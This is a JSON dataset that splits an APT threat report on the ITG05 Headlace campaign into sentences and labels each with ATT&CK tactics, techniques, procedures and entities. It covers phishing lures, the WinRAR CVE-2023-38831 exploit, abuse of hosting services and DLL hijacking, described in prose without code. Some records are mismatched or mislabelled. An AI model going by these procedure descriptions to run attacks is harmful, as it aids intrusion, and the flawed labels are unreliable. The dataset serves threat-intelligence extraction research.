Prospects\" on current results of the conflict in Ukraine, combat potentials and policy approaches for avoiding stalemate.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p3-s32-36a654", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 3, "sentence_id": 32, "context_before": "The invitation presents the findings of the paper \"War of Attrition: Comparison of Potentials and Assessment of Prospects\" on current results of the conflict in Ukraine, combat potentials and policy approaches for avoiding stalemate.", "sentence_text": "The campaign is directed at Romania-", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p3-s33-1e8f5d", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 3, "sentence_id": 33, "context_before": "The campaign is directed at Romania-", "sentence_text": "based targets based on the geolocation of the targeted download.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p4-s35-94afb5", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 4, "sentence_id": 35, "context_before": "Fig.", "sentence_text": "1: Lure document \"Letter of invitation to the expert discussion on the Razumkov Centre\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p5-s36-736c42", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 5, "sentence_id": 36, "context_before": "1: Lure document \"Letter of invitation to the expert discussion on the Razumkov Centre\"", "sentence_text": "Notably, this lure was contained in a .RAR archive exploiting CVE-2023-38831.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1203", "name": "Exploitation for Client Execution" } ], "procedure": "Package lure in a RAR archive exploiting CVE-2023-38831 to trigger execution.", "entities": [ { "text": ".RAR archive exploiting CVE-2023-38831", "start": 38, "end": 76, "label": "Action" }, { "text": "CVE-2023-38831", "start": 62, "end": 76, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-09_aptnotes_report-p5-s37-97c542", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 5, "sentence_id": 37, "context_before": "Notably, this lure was contained in a .RAR archive exploiting CVE-2023-38831.", "sentence_text": "If opened with WinRAR versions below 6.23, the exploit causes Headlace to silently execute if a user tries to open the benign PDF file.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "Exploit WinRAR vulnerability to trigger silent execution of Headlace when the user opens a benign PDF file.", "entities": [ { "text": "user tries to open the benign PDF file", "start": 96, "end": 134, "label": "Action" }, { "text": "causes Headlace to silently execute", "start": 55, "end": 90, "label": "Action" }, { "text": "Headlace", "start": 62, "end": 70, "label": "MalwareTool" } ] }, { "uid": "aptnotes-09_aptnotes_report-p5-s38-9eb95c", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 5, "sentence_id": 38, "context_before": "If opened with WinRAR versions below 6.23, the exploit causes Headlace to silently execute if a user tries to open the benign PDF file.", "sentence_text": "Example lure 2: SEDE-PV-2023-10-09-1_EN.docx Uploaded in mid-October 2023, the lure document titled \"SEDE- PV-2023-10-09-1_EN.docx\" features the publicly available  Minutes of the 9 October 2023 meeting of the Subcommittee on Security and Defence of the European Parliament.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p5-s39-1d29a1", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 5, "sentence_id": 39, "context_before": "Example lure 2: SEDE-PV-2023-10-09-1_EN.docx Uploaded in mid-October 2023, the lure document titled \"SEDE- PV-2023-10-09-1_EN.docx\" features the publicly available  Minutes of the 9 October 2023 meeting of the Subcommittee on Security and Defence of the European Parliament.", "sentence_text": "Included in the adopted agenda is the question of \"The security situation after the attack by Hamas against Israel, exchange of views with the EU’s Police Mission for the Palestinian Territories (EUPOLCOPPS)\nand the EU’s Border Assistance Mission in Rafah (EUBAM Rafah).\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p6-s41-ea35cb", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 6, "sentence_id": 41, "context_before": "Fig.", "sentence_text": "2: Lure document \"SEDE-PV-2023-10-09-1_EN.docx\" Example lure 3: war.docx", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p7-s42-d146ca", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 7, "sentence_id": 42, "context_before": "2: Lure document \"SEDE-PV-2023-10-09-1_EN.docx\" Example lure 3: war.docx", "sentence_text": "Uploaded in early November 2023, the document titled \"war.docx\" features an authentic copy of the publicly available Advance Unedited Version of the \"Report of the Special Committee to Investigate Israeli Practices Affecting the Human Rights of the Palestinian People and Other Arabs of the Occupied Territories\" presented at the seventy-eighth session of the General Assembly of the United Nations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p7-s43-039ae0", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 7, "sentence_id": 43, "context_before": "Uploaded in early November 2023, the document titled \"war.docx\" features an authentic copy of the publicly available Advance Unedited Version of the \"Report of the Special Committee to Investigate Israeli Practices Affecting the Human Rights of the Palestinian People and Other Arabs of the Occupied Territories\" presented at the seventy-eighth session of the General Assembly of the United Nations.", "sentence_text": "The contents feature policy questions and historical context related to the Levant between September 2022 to September 2023, preceding the surprise October 2023 attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p8-s45-7e3aec", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 8, "sentence_id": 45, "context_before": "Fig.", "sentence_text": "3: Lure document \"war.docx\"", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p9-s46-cb189c", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 9, "sentence_id": 46, "context_before": "3: Lure document \"war.docx\"", "sentence_text": "Example lure 4: Roadmap.docx", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p9-s47-eccd11", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 9, "sentence_id": 47, "context_before": "Example lure 4: Roadmap.docx", "sentence_text": "In mid-November 2023, a 15-page document titled \"roadmap\" was uploaded by multiple Azerbaijan-based users featuring what appears to be the internal mark-up version of a proposed \"Roadmap on the development of cooperation between the Republic of Belarus and the Republic of Azerbaijan until 2025\" associated with the Joint Intergovernmental Commission between the Republic of Azerbaijan and the Republic of Belarus on Economic Cooperation.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p9-s48-ff1b92", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 9, "sentence_id": 48, "context_before": "In mid-November 2023, a 15-page document titled \"roadmap\" was uploaded by multiple Azerbaijan-based users featuring what appears to be the internal mark-up version of a proposed \"Roadmap on the development of cooperation between the Republic of Belarus and the Republic of Azerbaijan until 2025\" associated with the Joint Intergovernmental Commission between the Republic of Azerbaijan and the Republic of Belarus on Economic Cooperation.", "sentence_text": "The document features two lines for signatures of approval by the respective state ministers, followed by a fillable date pre-populated with the year 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p9-s49-55f81b", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 9, "sentence_id": 49, "context_before": "The document features two lines for signatures of approval by the respective state ministers, followed by a fillable date pre-populated with the year 2023.", "sentence_text": "The document appears to be authentic given the metadata associated with user modifications.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p9-s51-2b5b8b", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 9, "sentence_id": 51, "context_before": "Fig.", "sentence_text": "4: Lure document \"Roadmap.docx\" Example lure 5: 2023-12-bois-position-on-accessing-capital-pr.docx Zz0yOWQ0ZTQzODk0NmYxMWVlOTZiOWZhMGIzZGI2NWMyMw==", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p10-s53-70a8f0", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 10, "sentence_id": 53, "context_before": "Fig.", "sentence_text": "5: Lure document \"2023-12-bois-position-on-accessing-capital-pr.docx\" In early December 2023, X-Force uncovered an ITG05 lure leveraging the authentic 5 December 2023 press release published by the Bank of Israel.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p10-s54-fdd1cf", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 10, "sentence_id": 54, "context_before": "5: Lure document \"2023-12-bois-position-on-accessing-capital-pr.docx\" In early December 2023, X-Force uncovered an ITG05 lure leveraging the authentic 5 December 2023 press release published by the Bank of Israel.", "sentence_text": "The document titled 2023-12-bois-position-on-accessing-capital-pr.docx details the “Main Points of the Bank of Israel’s Position Presented to the", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p11-s55-7582fb", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 11, "sentence_id": 55, "context_before": "The document titled 2023-12-bois-position-on-accessing-capital-pr.docx details the “Main Points of the Bank of Israel’s Position Presented to the", "sentence_text": "Knesset Economics Committee Regarding Nonbank Entities Accessing Sources of Capital to Expand their Provision of Loans Due to the War.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p11-s56-b49333", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 11, "sentence_id": 56, "context_before": "Knesset Economics Committee Regarding Nonbank Entities Accessing Sources of Capital to Expand their Provision of Loans Due to the War.”", "sentence_text": "Example lure 6:  IN11897.pdf Zz00YjNlNGJmMDk0NmYxMWVlYTEzYTdlOGMzM2EyMjBmNw== Fig.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p11-s57-d090bb", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 11, "sentence_id": 57, "context_before": "Example lure 6: IN11897.pdf Zz00YjNlNGJmMDk0NmYxMWVlYTEzYTdlOGMzM2EyMjBmNw== Fig.", "sentence_text": "6: Lure document \"IN11897.pdf\" In early December 2023, X-Force uncovered the ITG05 lure titled IN11897.pdf, which leverages the 20 November 2023 CRS update on “Russia’s War Against Ukraine: European Union Responses and U.S.-EU Relations.”", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p11-s58-910b92", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 11, "sentence_id": 58, "context_before": "6: Lure document \"IN11897.pdf\" In early December 2023, X-Force uncovered the ITG05 lure titled IN11897.pdf, which leverages the 20 November 2023 CRS update on “Russia’s War Against Ukraine: European Union Responses and U.S.-EU Relations.”", "sentence_text": "The publicly available document features key updates informing policymakers regarding the War in Ukraine distributed by the public policy research institute of the United States Congress.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p12-s59-d8b8a6", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 12, "sentence_id": 59, "context_before": "The publicly available document features key updates informing policymakers regarding the War in Ukraine distributed by the public policy research institute of the United States Congress.", "sentence_text": "Infection chain\nThe following represents X-Force's detailed analysis of the multiple infection chains associated with the lures above, ultimately delivering Headlace malware.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p14-s61-650d90", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 14, "sentence_id": 61, "context_before": "Fig.", "sentence_text": "7: Headlace full infection graph The diagram above is a high-level depiction of the Headlace infection flow.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p14-s62-420a4a", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 14, "sentence_id": 62, "context_before": "7: Headlace full infection graph The diagram above is a high-level depiction of the Headlace infection flow.", "sentence_text": "A deep dive into the different components impacting delivery including the abuse of commercial hosting services, multi-stage malware, exploitation, and command and control are explored in the following sections.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p14-s63-6089d9", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 14, "sentence_id": 63, "context_before": "A deep dive into the different components impacting delivery including the abuse of commercial hosting services, multi-stage malware, exploitation, and command and control are explored in the following sections.", "sentence_text": "Abusing commercial hosting services In September 2023, CERT-UA reported spear phishing emails containing URLs that led recipients to malicious archives hosted on abused, publicly available, commercial infrastructure; like the Mocky and Mockbin APIs and the Infinityfreeapp service.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Send spear phishing emails with URLs leading to malicious archives hosted on abused commercial infrastructure.", "entities": [ { "text": "spear phishing emails containing URLs", "start": 72, "end": 109, "label": "Action" }, { "text": "led recipients to malicious archives hosted on abused, publicly available, commercial infrastructure", "start": 115, "end": 215, "label": "Action" }, { "text": "Mocky", "start": 226, "end": 231, "label": "Infrastructure_Indicator" }, { "text": "Mockbin", "start": 236, "end": 243, "label": "Infrastructure_Indicator" }, { "text": "Infinityfreeapp", "start": 257, "end": 272, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-09_aptnotes_report-p14-s64-ed763b", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 14, "sentence_id": 64, "context_before": "Example URLs:\nLater, in late October through November 2023, X-Force observed a second legitimate service \"infinityfreeapp.com\" used to host malicious payloads.", "sentence_text": "The publicly available document features key updates informing policymakers regarding the War in Ukraine distributed by the public policy research institute of the United States Congress.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p14-s65-3e546e", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 14, "sentence_id": 65, "context_before": "Example URLs:\nLater, in late October through November 2023, X-Force observed a second legitimate service \"infinityfreeapp.com\" used to host malicious payloads.", "sentence_text": "The threat actor created several subdomains over the course of the campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "Create multiple subdomains to support campaign infrastructure.", "entities": [ { "text": "The threat actor", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "created several subdomains over the course of the campaigns", "start": 17, "end": 76, "label": "Action" } ] }, { "uid": "aptnotes-09_aptnotes_report-p14-s66-a0c6c6", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 14, "sentence_id": 66, "context_before": "The threat actor created several subdomains over the course of the campaigns.", "sentence_text": "The phishing URL would contain a unique hardcoded URL parameter \"id\".", "relevant": "yes", "tactic": [ { "name": "Initial Access", "id": "TA0001" } ], "techniques": [ { "name": "Phishing", "id": "T1566" } ], "procedure": "The phishing URL includes a hardcoded parameter used during the infection process.", "entities": [ { "text": "contain a unique hardcoded URL parameter", "start": 23, "end": 63, "label": "Action" } ] }, { "uid": "aptnotes-09_aptnotes_report-p14-s67-727e0c", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 14, "sentence_id": 67, "context_before": "The phishing URL would contain a unique hardcoded URL parameter \"id\".", "sentence_text": "This ID is necessary to be able to download the lure archive as well as Headlace's secondary payloads and likely allows ITG05 to track infections through all stages.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p14-s68-f6c328", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 14, "sentence_id": 68, "context_before": "This ID is necessary to be able to download the lure archive as well as Headlace's secondary payloads and likely allows ITG05 to track infections through all stages.", "sentence_text": "Once a victim visits the URL and passes the browser check, the site redirects to its filedwn.php script using the same \"id\" parameter.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Redirect victim to a server-side script (filedwn.php) using an ID parameter after passing browser checks.", "entities": [ { "text": "victim visits the URL and passes the browser check", "start": 7, "end": 57, "label": "Action" }, { "text": "redirects to its filedwn.php script using the same \"id\" parameter", "start": 68, "end": 133, "label": "Action" }, { "text": "URL", "start": 25, "end": 28, "label": "Infrastructure_Indicator" }, { "text": "filedwn.php", "start": 85, "end": 96, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-09_aptnotes_report-p14-s69-a1a5b8", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 14, "sentence_id": 69, "context_before": "Once a victim visits the URL and passes the browser check, the site redirects to its filedwn.php script using the same \"id\" parameter.", "sentence_text": "This causes the download of a ZIP file, again containing the Headlace payload.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Download a ZIP file containing the Headlace payload.", "entities": [ { "text": "download of a ZIP file, again containing the Headlace payload", "start": 16, "end": 77, "label": "Action" }, { "text": "Headlace payload", "start": 61, "end": 77, "label": "MalwareTool" } ] }, { "uid": "aptnotes-09_aptnotes_report-p14-s70-74527d", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 14, "sentence_id": 70, "context_before": "This causes the download of a ZIP file, again containing the Headlace payload.", "sentence_text": "Instead of the Mocky service, the Headlace backdoor uses the hardcoded id parameter to download the next payload via a URL calling the hosted execdwn.php file.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Use a hardcoded ID parameter to download the next payload via a URL calling execdwn.php.", "entities": [ { "text": "Headlace backdoor", "start": 34, "end": 51, "label": "MalwareTool" }, { "text": "uses the hardcoded id parameter to download the next payload via a URL calling the hosted execdwn.php file", "start": 52, "end": 158, "label": "Action" }, { "text": "execdwn.php", "start": 142, "end": 153, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-09_aptnotes_report-p14-s71-fc4a9b", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 14, "sentence_id": 71, "context_before": "Instead of the Mocky service, the Headlace backdoor uses the hardcoded id parameter to download the next payload via a URL calling the hosted execdwn.php file.", "sentence_text": "Example URLs:\ne715-4f79-99e8-1587300c1035\ne715-4f79-99e8-1587300c103\ne715-4f79-99e8-1587300c1035", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p15-s72-91cd37", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 15, "sentence_id": 72, "context_before": "Example URLs:\ne715-4f79-99e8-1587300c1035\ne715-4f79-99e8-1587300c103\ne715-4f79-99e8-1587300c1035", "sentence_text": "Browser checker\nBefore payloads are downloaded from the legitimate staging services, a Javascript-based browser enumeration script verifies the user agent and in some cases the geolocation of the victim.", "relevant": "yes", "tactic": [ { "id": "TA0007", "name": "Discovery" } ], "techniques": [ { "id": "T1082", "name": "System Information Discovery" } ], "procedure": "Verify victim environment by checking user agent and geolocation using a browser enumeration script before payload delivery.", "entities": [ { "text": "Javascript-based browser enumeration script", "start": 87, "end": 130, "label": "MalwareTool" }, { "text": "verifies the user agent and in some cases the geolocation of the victim", "start": 131, "end": 202, "label": "Action" } ] }, { "uid": "aptnotes-09_aptnotes_report-p15-s73-c11093", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 15, "sentence_id": 73, "context_before": "Browser checker\nBefore payloads are downloaded from the legitimate staging services, a Javascript-based browser enumeration script verifies the user agent and in some cases the geolocation of the victim.", "sentence_text": "Different versions of the script are used up to three times within a single infection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p15-s74-ff4d13", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 15, "sentence_id": 74, "context_before": "Different versions of the script are used up to three times within a single infection.", "sentence_text": "Infections start with the phishing URL, which redirects to the first download site after a first check.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Initiate infection via a phishing URL that redirects to a download site.", "entities": [ { "text": "phishing URL", "start": 26, "end": 38, "label": "Infrastructure_Indicator" }, { "text": "redirects to the first download site after a first check", "start": 46, "end": 102, "label": "Action" } ] }, { "uid": "aptnotes-09_aptnotes_report-p15-s75-5d4651", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 15, "sentence_id": 75, "context_before": "Infections start with the phishing URL, which redirects to the first download site after a first check.", "sentence_text": "After a successful lure download, the victim is redirected to www.msn.com.", "relevant": "yes", "tactic": [ { "name": "Defense Evasion", "id": "TA0005" } ], "techniques": null, "procedure": "The victim is redirected to an external website after downloading the lure.", "entities": [ { "text": "is redirected", "start": 45, "end": 58, "label": "Action" }, { "text": "www.msn.com", "start": 62, "end": 73, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-09_aptnotes_report-p15-s76-c6c11a", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 15, "sentence_id": 76, "context_before": "After a successful lure download, the victim is redirected to www.msn.com.", "sentence_text": "Should the request originate from a different country other than the one targeted, ITG05 will drop a non-weaponized version of the archive.", "relevant": "yes", "tactic": [ { "name": "Defense Evasion", "id": "TA0005" } ], "techniques": null, "procedure": "The malware delivers a benign version of the archive when conditions are not met.", "entities": [ { "text": "will drop a non-weaponized version of the archive", "start": 89, "end": 138, "label": "Action" } ] }, { "uid": "aptnotes-09_aptnotes_report-p15-s77-b33526", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 15, "sentence_id": 77, "context_before": "Should the request originate from a different country other than the one targeted, ITG05 will drop a non-weaponized version of the archive.", "sentence_text": "This version would only contain the benign lure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p15-s78-34fb05", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 15, "sentence_id": 78, "context_before": "This version would only contain the benign lure.", "sentence_text": "Later campaigns using policy-themed lures employed the same technique of dropping only benign lures should any of the checks fail.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036", "name": "Masquerading" } ], "procedure": "Drop benign lure files instead of malicious payloads when checks fail to evade detection.", "entities": [ { "text": "dropping only benign lures should any of the checks fail", "start": 73, "end": 129, "label": "Action" } ] }, { "uid": "aptnotes-09_aptnotes_report-p15-s79-cec69d", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 15, "sentence_id": 79, "context_before": "After the successful execution of the Headlace dropper, the backdoor uses a second download site to stage secondary payloads.", "sentence_text": "After the successful execution of the Headlace dropper, the backdoor uses a second download site to stage secondary payloads.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Use a secondary download site to stage and retrieve additional payloads.", "entities": [ { "text": "Headlace dropper", "start": 38, "end": 54, "label": "MalwareTool" }, { "text": "uses a second download site to stage secondary payloads", "start": 69, "end": 124, "label": "Action" }, { "text": "second download site", "start": 76, "end": 96, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-09_aptnotes_report-p15-s80-9cc690", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 15, "sentence_id": 80, "context_before": "After the successful execution of the Headlace dropper, the backdoor uses a second download site to stage secondary payloads.", "sentence_text": "These are downloaded in MS Edge headless mode, so the corresponding browser scripts check if the user agent contains the string \"edge\".", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1105", "name": "Ingress Tool Transfer" } ], "procedure": "Download payloads in headless MS Edge mode while checking the user agent string for \"edge\".", "entities": [ { "text": "downloaded in MS Edge headless mode", "start": 10, "end": 45, "label": "Action" }, { "text": "browser scripts check if the user agent contains the string \"edge\"", "start": 68, "end": 134, "label": "Action" }, { "text": "MS Edge", "start": 24, "end": 31, "label": "Infrastructure_Indicator" } ] }, { "uid": "aptnotes-09_aptnotes_report-p15-s81-21a552", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 15, "sentence_id": 81, "context_before": "These are downloaded in MS Edge headless mode, so the corresponding browser scripts check if the user agent contains the string \"edge\".", "sentence_text": "Often the second download site performs another geolocation check:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p16-s83-e8386b", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 16, "sentence_id": 83, "context_before": "Fig.", "sentence_text": "9: Browser enumeration script verifying geolocation in Turkey before dropping a payload disguised as a .CSS file X-Force observed large numbers of browser enumeration scripts specifically targeting the following countries:\n• Hungary\n• Türkiye\n• Australia\n• Poland\n• Belgium\n• Ukraine\n• Germany\n• Azerbaijan\n• Saudi Arabia • Kazakhstan • Italy • Latvia •", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p16-s84-a0f1a0", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 16, "sentence_id": 84, "context_before": "9: Browser enumeration script verifying geolocation in Turkey before dropping a payload disguised as a .CSS file X-Force observed large numbers of browser enumeration scripts specifically targeting the following countries:\n• Hungary\n• Türkiye\n• Australia\n• Poland\n• Belgium\n• Ukraine\n• Germany\n• Azerbaijan\n• Saudi Arabia • Kazakhstan • Italy • Latvia •", "sentence_text": "Romania Later variants of the enumeration and verification scripts are likely implemented server-side with a specific hardcoded ID, which is provided in the first phishing URL and is required during all later stages as a URL parameter.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p16-s85-4b9505", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 16, "sentence_id": 85, "context_before": "Romania Later variants of the enumeration and verification scripts are likely implemented server-side with a specific hardcoded ID, which is provided in the first phishing URL and is required during all later stages as a URL parameter.", "sentence_text": "Headlace\nX-Force observed three possible execution chains implemented by ITG05 for executing the Headlace malware:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p16-s86-ce1f8d", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 16, "sentence_id": 86, "context_before": "Headlace\nX-Force observed three possible execution chains implemented by ITG05 for executing the Headlace malware:", "sentence_text": "Execution via WinRAR vulnerability In this chain, a victim is targeted via the CVE-2023-38831 WinRAR vulnerability.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "aptnotes-09_aptnotes_report-p16-s87-b6eff3", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 16, "sentence_id": 87, "context_before": "Execution via WinRAR vulnerability In this chain, a victim is targeted via the CVE-2023-38831 WinRAR vulnerability.", "sentence_text": "If the victim has a vulnerable WinRAR application and opens the archive, the lure document is presented while the Headlace dropper is executed in the background.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1204", "name": "User Execution" } ], "procedure": "Trigger execution of the Headlace dropper when the victim opens a malicious archive.", "entities": [ { "text": "opens the archive", "start": 54, "end": 71, "label": "Action" }, { "text": "Headlace dropper", "start": 114, "end": 130, "label": "MalwareTool" }, { "text": "is executed in the background", "start": 131, "end": 160, "label": "Action" } ] }, { "uid": "aptnotes-09_aptnotes_report-p17-s88-f98629", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 17, "sentence_id": 88, "context_before": "If the victim has a vulnerable WinRAR application and opens the archive, the lure document is presented while the Headlace dropper is executed in the background.", "sentence_text": "Execution via DLL hijacking The DLL-hijacking chain involves delivering a legitimate Microsoft Calc.exe binary that is susceptible to DLL-hijacking.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1574.001", "name": "Hijack Execution Flow: DLL Search Order Hijacking" } ], "procedure": "Deliver a legitimate Calc.exe binary susceptible to DLL hijacking to facilitate malicious execution.", "entities": [ { "text": "delivering a legitimate Microsoft Calc.exe binary", "start": 61, "end": 110, "label": "Action" }, { "text": "Calc.exe", "start": 95, "end": 103, "label": "MalwareTool" } ] }, { "uid": "aptnotes-09_aptnotes_report-p17-s89-2169fb", "source": "aptnotes", "doc_id": "09_aptnotes_report", "page_number": 17, "sentence_id": 89, "context_before": "Execution via DLL hijacking The DLL-hijacking chain involves delivering a legitimate Microsoft Calc.exe binary that is susceptible to DLL-hijacking.", "sentence_text": "This involves the victim clicking on Calc.exe to load a malicious DLL that is packaged alongside Calc in the malicious archive.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1204", "name": "User Execution" }, { "id": "T1574.001", "name": "Hijack Execution Flow: DLL Search Order Hijacking" } ], "procedure": "Trick the victim into executing Calc.exe to load a malicious DLL via DLL hijacking.", "entities": [ { "text": "victim 